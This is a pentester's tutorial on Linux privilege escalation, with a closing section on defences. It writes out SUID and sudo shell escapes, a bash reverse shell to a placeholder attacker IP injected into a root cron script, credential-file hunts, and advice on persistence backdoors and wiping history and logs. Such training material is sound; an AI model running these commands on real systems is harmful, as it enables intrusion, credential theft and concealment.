Linux Privilege Escalation: A Pentester's Practical Guide

Linux privilege escalation is the critical process of gaining higher-level permissions on a compromised Linux system than initially acquired, typically moving from a low-privileged user to a root user. For pentesters, bug bounty hunters, and red teamers, it's often the "holy grail" after gaining an initial foothold, transforming limited access into full control. This guide walks you through the most effective and common Linux privilege escalation techniques, offering hands-on examples and the practical insights I've gathered from years in the trenches.

Understanding Linux Privilege Escalation: Why It Matters

You've landed a shell. Maybe it was through a web vulnerability like XSS leading to an RCE, or perhaps an exposed service. Great job! But now you're likely a low-privileged user, perhaps www-data or a limited service account. This isn't enough for true impact. You can't install persistent backdoors, access sensitive system configurations, or pivot to other machines with these limited rights. Privilege escalation is about turning that initial foot-in-the-door into complete command of the system.

The journey from a basic shell to root access is a fascinating puzzle, often requiring a deep understanding of Linux internals, common misconfigurations, and software vulnerabilities. It starts with meticulous reconnaissance. You can't exploit what you don't know is there. My first steps always involve figuring out:

• Who am I? whoami, id
• What's the system? uname -a, cat /etc/os-release
• What's running? ps aux, netstat -tulpn
• What files are where? Basic file system traversal, looking for configs, logs, sensitive data.

Key Takeaway: Privilege escalation isn't a single step; it's a phase of relentless enumeration and creative problem-solving. Your initial foothold is just the beginning of the real work.

Common Linux Privilege Escalation Techniques Explained

Over the years, certain patterns and vulnerabilities consistently appear in Linux systems, offering pathways to higher privileges. Let's break down the most common and effective ones.

SUID/SGID Binaries: The Classic Pathway to Root

SUID (Set User ID) and SGID (Set Group ID) bits are special permissions on executable files. When a program with the SUID bit set is executed, it runs with the permissions of the file's owner (usually root), not the user executing it. Similarly, SGID runs with the group permissions. This is how commands like passwd work, allowing regular users to change their password by writing to /etc/shadow, a file only root can directly modify.

The trick is finding SUID/SGID binaries that shouldn't have these permissions or can be abused. Many legitimate programs, when run with elevated privileges, can be manipulated to execute arbitrary commands as root.

How to find them:

find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

Once you have a list, cross-reference it with GTFOBins. This fantastic resource details how to bypass local security restrictions by exploiting legitimate Unix binaries. For example, if you find find or nmap with SUID permissions:

Practical Example: Abusing SUID-enabled find

If find has the SUID bit, you can execute commands as root:

/usr/bin/find . -exec /bin/sh -p \; -quit

This command tells find to execute /bin/sh -p (a privileged shell) for the current directory and then quit. You'll often drop into a root shell.

Exploiting Weak SUDO Permissions: The Path of Trust

The sudo command allows a permitted user to execute a command as the superuser or another user, as specified by the sudoers file. Misconfigurations in this file are a goldmine for privilege escalation.

First, check what commands you can run as sudo without a password:

sudo -l

Look for entries like (ALL) NOPASSWD: ALL (game over, you can run anything as root) or specific commands. If you can run a command as root, check GTFOBins again. Even seemingly innocuous commands can be abused.

Practical Example: Abusing sudo apt or sudo less

If you can run apt as sudo, you can often get a root shell:

sudo apt update
sudo apt install -y <package> # if a package is available that gives a shell or overwrites a config
# Alternatively, if you can run apt edit-sources, you might be able to inject malicious repos.

A simpler example: if you can run sudo less, you can escape to a root shell from within less:

sudo less /etc/profile
# Inside less, type "!/bin/sh" (or "!/bin/bash") and press Enter.

This trick works because less, when run with sudo, executes external commands (like !/bin/sh) as the user it was invoked as – in this case, root.

Kernel Exploits: When Software Fails

Sometimes, the operating system kernel itself has vulnerabilities. These are typically complex, but when they hit, they often provide immediate root access. Identifying the kernel version is the first step:

uname -a
cat /etc/issue

Once you have the kernel version and architecture (e.g., Linux 4.4.0-186-generic x86_64), you can search exploit databases like Exploit-DB or use tools like searchsploit (available on Kali Linux) to find known vulnerabilities. Many of these require compiling and executing a C program on the target machine.

Practical Example: Dirty COW (CVE-2016-5195)

Dirty COW was a critical kernel vulnerability affecting Linux kernels from 2007 to 2016. It allowed a local unprivileged user to gain write access to otherwise read-only memory mappings, which could be used to escalate privileges. While patched, it serves as a classic example of a powerful kernel exploit.

# Example steps (highly simplified, actual exploit involved C code compilation)
# 1. Transfer the compiled exploit binary to the target.
# 2. Execute the exploit: ./dirtycow_exploit
# 3. Often, the exploit would modify /etc/passwd or similar to give you a root shell or change a password.

Always verify the exploit's compatibility with the target system's kernel version and architecture. Mismatches often lead to system crashes.

Cron Jobs: Scheduled Attacks

Cron jobs are tasks scheduled to run periodically on a Linux system. They're specified in crontab files, and misconfigurations here can open doors to privilege escalation.

Check the system's crontab files:

cat /etc/crontab
ls -la /etc/cron.*
cat /var/spool/cron/crontabs/* # For user-specific crontabs

Look for a few things:

1. Scripts running as root that you can modify.
2. Scripts in writable directories that might be executed by root.
3. Wildcard vulnerabilities in cron scripts (e.g., find /var/log -name "*.log" -exec rm {} \; if rm isn't specified with full path, allowing arbitrary command injection).

Practical Example: Writable Cron Script

Suppose you find a cron job running as root, executing a script in a directory you have write permissions to:

# /etc/crontab entry:
# * * * * * root /opt/cleanup_script.sh

And you have write permissions on /opt/cleanup_script.sh. You could inject a reverse shell payload:

echo "bash -i >& /dev/tcp/YOUR_ATTACKER_IP/4444 0>&1" > /opt/cleanup_script.sh

Set up a netcat listener on your machine, and when the cron job runs, you'll catch a root shell.

Weak File Permissions and Misconfigurations

This category is broad, but it boils down to finding files or directories with overly permissive permissions that a low-privileged user can exploit. This includes:

• Writable /etc/passwd or /etc/shadow: If you can write to these, you can add a new root user or change existing passwords. Highly unlikely on a well-configured system, but not impossible on older or extremely misconfigured ones.
• Writable configuration files: Database credentials (my.cnf), application configuration files (e.g., web server configs with admin passwords), SSH keys (id_rsa).
• Writable service directories: If a service (like a web server or a custom application) runs as root and loads files from a directory you can write to, you might be able to inject malicious libraries or scripts.
• Abusing LD_PRELOAD: If you can modify environment variables and execute a SUID binary, you might be able to inject a malicious shared library using LD_PRELOAD to gain root.

Practical Example: Writable SSH Keys

Imagine finding /home/admin/.ssh/id_rsa (a private key) readable by your low-privileged user. This key might allow you to SSH into the system as the admin user, potentially with higher privileges, or even to other systems.

cat /home/admin/.ssh/id_rsa # Copy the key
ssh -i id_rsa admin@localhost # Log in as admin

Always hunt for credentials or sensitive files:

find / -name "*config*" 2>/dev/null
find / -name "*pass*" 2>/dev/null
find / -name "*id_rsa*" 2>/dev/null
grep -r "password" /var/www/html/ 2>/dev/null # For web roots

Leveraging Automated Tools for Linux Privilege Escalation

While manual enumeration is crucial, automated scripts can significantly speed up the process by checking hundreds of common vectors quickly.

LinPEAS: Your Go-To Enumeration Script

LinPEAS (Linux Privilege Escalation Awesome Script) is an incredible tool that automates much of the manual reconnaissance we've discussed. It checks for a vast array of potential privilege escalation vectors, from SUID binaries and writable files to kernel vulnerabilities and weak service configurations.

How to use it:

1. Download linpeas.sh to your attacking machine.
2. Transfer it to the target system (using wget, curl, netcat, or Python SimpleHTTPServer).
3. Make it executable: chmod +x linpeas.sh
4. Run it: ./linpeas.sh

# On attacker machine (in the directory of linpeas.sh)
python3 -m http.server 8000

# On target machine
wget http://YOUR_ATTACKER_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

LinPEAS outputs its findings with color-coded severity, making it easier to spot critical vulnerabilities. You'll see highlights for potential SUID exploits, writable cron jobs, interesting files, and much more.

PwnKit and Other Specific Exploits

Beyond general enumeration, specific, well-known exploits sometimes exist for system components. For instance, PwnKit (CVE-2021-4034) was a significant local privilege escalation vulnerability in Polkit's pkexec utility, affecting nearly all major Linux distributions. Once discovered, exploits quickly emerged, providing reliable root access.

When you identify specific software versions (e.g., a vulnerable Polkit version, a specific kernel), use searchsploit or online exploit databases to find pre-made exploits. Metasploit also contains many local privilege escalation modules.

# Example: Using searchsploit for PwnKit
searchsploit pwnkit
# This will list available exploits and their paths in the Exploit-DB repository.
# You'd then transfer the relevant C code, compile it, and run it on the target.

Key Takeaway: Automated tools like LinPEAS are excellent for initial scans, but always follow up manually. The human eye often spots context-specific issues that automated scripts miss. For specific vulnerabilities, exploit databases are your friend.

Practical Strategies and Best Practices for Privilege Escalation

Success in privilege escalation isn't just about knowing techniques; it's about having a systematic approach and a relentless enumeration mindset.

The Enumeration Mindset: Don't Stop Digging

I can't stress this enough: always look for more. Even when you think you've checked everything, there's often one more stone unturned. Here's a checklist of things I consistently look for:

• Environment Variables: Check env for sensitive information, paths, or unusual settings.
• Processes: ps aux and pstree can reveal processes running as root or other privileged users, especially those with unusual arguments or listening ports.
• Network Connections: netstat -tulpn shows listening services and active connections. Are there local services only accessible from localhost? Could you interact with them?
• Installed Software: dpkg -l (Debian/Ubuntu) or rpm -qa (Red Hat/CentOS) lists installed packages. Are there outdated or vulnerable applications?
• History Files: cat ~/.bash_history (or ~/.zsh_history) for the current user and other users you can read. You might find passwords, sensitive commands, or paths.
• Web Server Files: If it's a web server, check its configuration (Apache, Nginx) and web application files for database credentials, API keys, or writable upload directories.
• SUID/SGID/Capabilities: Re-check these. Sometimes you miss something or a new file appears.
• Mounted Filesystems: mount. Are there network shares (NFS, Samba) that you can write to, and which are mounted with SUID permissions?

This persistent curiosity is what separates good pentesters from great ones. Many CTF challenges hinge on this kind of deep dive.

Post-Exploitation Hygiene and Persistence

Once you've achieved root, your work isn't done. You'll want to ensure you can regain access later (persistence) and clean up your tracks (hygiene).

• Persistence:
  • Add your SSH public key to /root/.ssh/authorized_keys.
  • Create a new user with sudo privileges.
  • Modify existing services or create new ones (e.g., systemd units, cron jobs) to run a reverse shell or backdoor.
• Hygiene:
  • Remove any exploit binaries or scripts you uploaded.
  • Clear history files (history -c && rm ~/.bash_history).
  • Remove log entries related to your activities (though this can be tricky and might raise alarms).

Defending Against Linux Privilege Escalation Attacks

As a pentester, understanding how to attack also makes you better at defending. Here are key defensive strategies:

• Principle of Least Privilege: Give users and services only the minimum permissions necessary to perform their functions. Don't run services as root unless absolutely required.
• Regular Patching and Updates: Keep your kernel and all software up-to-date. This mitigates known kernel exploits and vulnerabilities in applications.
• Secure SUID/SGID Configuration: Audit SUID/SGID binaries regularly. Remove these bits from any programs that don't absolutely need them.
• Strict SUDOers File: Configure sudoers very carefully. Avoid NOPASSWD: ALL. Specify exact commands with full paths.
• File Permissions: Enforce strict file and directory permissions. Regularly audit critical system files (/etc/passwd, /etc/shadow, service configuration files) for unauthorized write access.
• Monitor Cron Jobs: Regularly review crontab entries for suspicious scripts or configurations.
• Security-Enhanced Linux (SELinux) / AppArmor: Implement mandatory access control (MAC) mechanisms to further restrict what processes can do, even if they gain elevated privileges.
• Logging and Monitoring: Implement robust logging (e.g., using auditd) and monitor logs for unusual activity, failed login attempts, or execution of suspicious commands.

Linux privilege escalation is a dynamic field, with new techniques and exploits emerging regularly. Staying current with security news, practicing on TryHackMe or Hack The Box, and constantly refining your enumeration skills will keep you sharp. Happy hunting!

Frequently Asked Questions

What is the most common Linux privilege escalation technique?

The most common Linux privilege escalation techniques involve misconfigurations in SUID/SGID binaries and weak SUDO permissions. These are frequently found on systems and often provide straightforward pathways to root if not properly secured, making them a primary target for pentesters.

How do I check for SUID binaries that can be exploited?

You can check for SUID binaries using the command find / -perm -u=s -type f 2>/dev/null. Once you have a list, cross-reference the found binaries with GTFOBins to see if they have known methods for privilege escalation, such as escaping to a shell.

What is LinPEAS and how does it help with Linux privilege escalation?

LinPEAS (Linux Privilege Escalation Awesome Script) is an automated script that enumerates potential privilege escalation vectors on a Linux system. It checks for SUID/SGID binaries, weak file permissions, kernel vulnerabilities, cron job misconfigurations, and more, providing a comprehensive report to guide your manual exploitation efforts.

Is kernel exploitation still a relevant Linux privilege escalation method?

Yes, kernel exploitation remains a highly relevant and impactful Linux privilege escalation method, especially against unpatched or older systems. While more complex to execute, successful kernel exploits often provide immediate root access and are frequently seen in CTFs and real-world scenarios against systems that haven't kept up with security updates.